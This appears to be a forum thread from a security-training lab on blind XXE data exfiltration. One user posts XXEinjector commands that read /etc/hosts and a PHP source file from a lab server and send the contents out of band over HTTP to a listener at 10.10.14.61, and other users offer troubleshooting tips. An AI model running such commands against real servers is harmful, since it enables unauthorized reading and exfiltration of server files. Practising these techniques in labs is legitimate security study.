Web Attacks - Blind Data Exfiltration

Hi, guys

I’m stucking here:

ruby XXEinjector.rb --host=10.10.14.61 --httpport=8000 --file=/tmp/xxe.req --path=/etc/hosts --oob=http --phpfilter – Works

ruby XXEinjector.rb --host=10.10.14.61 --httpport=8000 --file=/tmp/xxe.req --path=/var/www/html/blind/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter – Doesn’t work

I think the problem is PATH, “/var/www/html” is NOT the real path in remote server, any suggestions?!

Thank you in advance!

Hey! I don’t know if you have already figured this one out or not, but I just wanted to say your post helped me figure out what I was doing wrong. :slight_smile:

Anyway - try the attack again but with just the file, not the whole path.

change path is a good idea, but can’t receive data, even “/etc/hosts” :rofl: